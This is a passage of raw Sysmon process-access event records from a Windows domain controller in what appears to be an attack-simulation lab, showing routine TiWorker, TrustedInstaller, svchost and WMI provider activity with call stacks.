4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.102{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.102{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.086{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 